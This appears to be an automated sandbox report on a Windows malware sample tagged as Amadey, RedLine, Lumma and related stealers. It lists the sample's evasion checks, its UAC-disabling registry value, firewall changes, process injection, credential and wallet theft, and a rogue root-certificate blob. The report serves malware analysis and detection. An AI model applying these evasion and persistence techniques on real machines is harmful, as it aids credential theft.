Malware Analysis Report

2025-06-15 19:54

Sample ID 240425-2d6ansga4s
Target f9e1bf035e5664900080e1ae1d88d6249049aec0da812c49bb976af43a7bc287
SHA256 f9e1bf035e5664900080e1ae1d88d6249049aec0da812c49bb976af43a7bc287
Tags
amadey evasion trojan glupteba lumma redline stealc zgrat @cloudytteam test1234 discovery dropper infostealer loader rat spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

f9e1bf035e5664900080e1ae1d88d6249049aec0da812c49bb976af43a7bc287

Threat Level: Known bad

The file f9e1bf035e5664900080e1ae1d88d6249049aec0da812c49bb976af43a7bc287 was found to be: Known bad.

Malicious Activity Summary

amadey evasion trojan glupteba lumma redline stealc zgrat @cloudytteam test1234 discovery dropper infostealer loader rat spyware stealer

Detect ZGRat V1

Glupteba payload

Glupteba

RedLine payload

ZGRat

Amadey

Stealc

UAC bypass

RedLine

Lumma Stealer

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Modifies Windows Firewall

Downloads MZ/PE file

Stops running service(s)

Blocklisted process makes network request

Executes dropped EXE

Loads dropped DLL

Reads local data of messenger clients

Reads user/profile data of web browsers

Identifies Wine through registry keys

Checks BIOS information in registry

Reads WinSCP keys stored on the system

Accesses cryptocurrency files/wallets, possible credential harvesting

Checks whether UAC is enabled

Legitimate hosting services abused for malware hosting/C2

Checks installed software on the system

Looks up external IP address via web service

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of SetThreadContext

Launches sc.exe

Drops file in Program Files directory

Drops file in Windows directory

Enumerates physical storage devices

Unsigned PE

Program crash

System policy modification

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Modifies system certificate store

Suspicious behavior: EnumeratesProcesses

Creates scheduled task(s)

Suspicious use of FindShellTrayWindow

Checks processor information in registry

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-04-25 22:28

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-04-25 22:28

Reported

2024-04-25 22:34

Platform

win7-20240221-en

Max time kernel

118s

Max time network

120s

Command Line

"C:\Users\Admin\AppData\Local\Temp\f9e1bf035e5664900080e1ae1d88d6249049aec0da812c49bb976af43a7bc287.exe"

Signatures

Amadey

trojan amadey

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\f9e1bf035e5664900080e1ae1d88d6249049aec0da812c49bb976af43a7bc287.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\f9e1bf035e5664900080e1ae1d88d6249049aec0da812c49bb976af43a7bc287.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\f9e1bf035e5664900080e1ae1d88d6249049aec0da812c49bb976af43a7bc287.exe N/A

Identifies Wine through registry keys

evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\f9e1bf035e5664900080e1ae1d88d6249049aec0da812c49bb976af43a7bc287.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\f9e1bf035e5664900080e1ae1d88d6249049aec0da812c49bb976af43a7bc287.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\chrosha.job C:\Users\Admin\AppData\Local\Temp\f9e1bf035e5664900080e1ae1d88d6249049aec0da812c49bb976af43a7bc287.exe N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\f9e1bf035e5664900080e1ae1d88d6249049aec0da812c49bb976af43a7bc287.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\f9e1bf035e5664900080e1ae1d88d6249049aec0da812c49bb976af43a7bc287.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\f9e1bf035e5664900080e1ae1d88d6249049aec0da812c49bb976af43a7bc287.exe

"C:\Users\Admin\AppData\Local\Temp\f9e1bf035e5664900080e1ae1d88d6249049aec0da812c49bb976af43a7bc287.exe"

Network

N/A

Files

memory/1940-0-0x0000000000300000-0x00000000007B7000-memory.dmp

memory/1940-1-0x0000000076FB0000-0x0000000076FB2000-memory.dmp

memory/1940-13-0x00000000008E0000-0x00000000008E1000-memory.dmp

memory/1940-12-0x0000000000800000-0x0000000000801000-memory.dmp

memory/1940-11-0x0000000001130000-0x0000000001131000-memory.dmp

memory/1940-10-0x0000000000F90000-0x0000000000F91000-memory.dmp

memory/1940-9-0x0000000000BD0000-0x0000000000BD1000-memory.dmp

memory/1940-8-0x00000000008D0000-0x00000000008D1000-memory.dmp

memory/1940-7-0x00000000002E0000-0x00000000002E1000-memory.dmp

memory/1940-6-0x0000000002650000-0x0000000002651000-memory.dmp

memory/1940-5-0x0000000000DF0000-0x0000000000DF1000-memory.dmp

memory/1940-4-0x0000000001000000-0x0000000001001000-memory.dmp

memory/1940-3-0x0000000000FA0000-0x0000000000FA1000-memory.dmp

memory/1940-2-0x0000000000300000-0x00000000007B7000-memory.dmp

memory/1940-17-0x00000000002F0000-0x00000000002F1000-memory.dmp

memory/1940-22-0x0000000000300000-0x00000000007B7000-memory.dmp

memory/1940-18-0x00000000028C0000-0x00000000028C1000-memory.dmp

memory/1940-15-0x0000000002660000-0x0000000002661000-memory.dmp

memory/1940-14-0x0000000000BC0000-0x0000000000BC1000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-04-25 22:28

Reported

2024-04-25 22:34

Platform

win10-20240404-en

Max time kernel

93s

Max time network

297s

Command Line

"C:\Users\Admin\AppData\Local\Temp\f9e1bf035e5664900080e1ae1d88d6249049aec0da812c49bb976af43a7bc287.exe"

Signatures

Amadey

trojan amadey

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Lumma Stealer

stealer lumma

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Stealc

stealer stealc

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\1000226001\Uni400uni.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\1000181001\file300un.exe N/A

ZGRat

rat zgrat

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\f9e1bf035e5664900080e1ae1d88d6249049aec0da812c49bb976af43a7bc287.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A

Stops running service(s)

evasion

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\f9e1bf035e5664900080e1ae1d88d6249049aec0da812c49bb976af43a7bc287.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\f9e1bf035e5664900080e1ae1d88d6249049aec0da812c49bb976af43a7bc287.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe N/A

Identifies Wine through registry keys

evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\f9e1bf035e5664900080e1ae1d88d6249049aec0da812c49bb976af43a7bc287.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Reads WinSCP keys stored on the system

spyware stealer

Reads local data of messenger clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Checks installed software on the system

discovery

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\1000226001\Uni400uni.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\1000226001\Uni400uni.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\1000181001\file300un.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\1000181001\file300un.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\f9e1bf035e5664900080e1ae1d88d6249049aec0da812c49bb976af43a7bc287.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\GameServerClient\installc.bat C:\Users\Admin\AppData\Local\Temp\1000208001\install.exe N/A
File created C:\Program Files (x86)\GameServerClient\installg.bat C:\Users\Admin\AppData\Local\Temp\1000208001\install.exe N/A
File created C:\Program Files (x86)\GameServerClient\GameService.exe C:\Users\Admin\AppData\Local\Temp\1000208001\install.exe N/A
File opened for modification C:\Program Files (x86)\GameServerClient\GameServerClient.exe C:\Users\Admin\AppData\Local\Temp\1000208001\install.exe N/A
File created C:\Program Files (x86)\GameServerClient\GameServerClientC.exe C:\Users\Admin\AppData\Local\Temp\1000208001\install.exe N/A
File opened for modification C:\Program Files (x86)\GameServerClient\installc.bat C:\Users\Admin\AppData\Local\Temp\1000208001\install.exe N/A
File opened for modification C:\Program Files (x86)\GameServerClient\installg.bat C:\Users\Admin\AppData\Local\Temp\1000208001\install.exe N/A
File opened for modification C:\Program Files (x86)\GameServerClient\GameService.exe C:\Users\Admin\AppData\Local\Temp\1000208001\install.exe N/A
File created C:\Program Files (x86)\GameServerClient\GameServerClient.exe C:\Users\Admin\AppData\Local\Temp\1000208001\install.exe N/A
File opened for modification C:\Program Files (x86)\GameServerClient\GameServerClientC.exe C:\Users\Admin\AppData\Local\Temp\1000208001\install.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\chrosha.job C:\Users\Admin\AppData\Local\Temp\f9e1bf035e5664900080e1ae1d88d6249049aec0da812c49bb976af43a7bc287.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\sc.exe N/A
N/A N/A C:\Windows\SysWOW64\sc.exe N/A

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61 C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\f9e1bf035e5664900080e1ae1d88d6249049aec0da812c49bb976af43a7bc287.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\f9e1bf035e5664900080e1ae1d88d6249049aec0da812c49bb976af43a7bc287.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1680 wrote to memory of 200 N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe
PID 1680 wrote to memory of 200 N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe
PID 1680 wrote to memory of 200 N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe
PID 200 wrote to memory of 2296 N/A C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 200 wrote to memory of 2296 N/A C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 200 wrote to memory of 2296 N/A C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 200 wrote to memory of 2296 N/A C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 200 wrote to memory of 2296 N/A C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 200 wrote to memory of 2296 N/A C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 200 wrote to memory of 2296 N/A C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 200 wrote to memory of 2296 N/A C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 200 wrote to memory of 2296 N/A C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1680 wrote to memory of 2336 N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe
PID 1680 wrote to memory of 2336 N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe
PID 1680 wrote to memory of 2336 N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe
PID 2336 wrote to memory of 956 N/A C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2336 wrote to memory of 956 N/A C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2336 wrote to memory of 956 N/A C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2336 wrote to memory of 956 N/A C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2336 wrote to memory of 956 N/A C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2336 wrote to memory of 956 N/A C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2336 wrote to memory of 956 N/A C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2336 wrote to memory of 956 N/A C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 956 wrote to memory of 1396 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe
PID 956 wrote to memory of 1396 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe
PID 956 wrote to memory of 1396 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe
PID 956 wrote to memory of 2892 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe
PID 956 wrote to memory of 2892 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe
PID 1680 wrote to memory of 1924 N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe
PID 1680 wrote to memory of 1924 N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe
PID 1680 wrote to memory of 1924 N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe
PID 1924 wrote to memory of 1932 N/A C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1924 wrote to memory of 1932 N/A C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1924 wrote to memory of 1932 N/A C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1924 wrote to memory of 1932 N/A C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1924 wrote to memory of 1932 N/A C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1924 wrote to memory of 1932 N/A C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1924 wrote to memory of 1932 N/A C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1924 wrote to memory of 1932 N/A C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
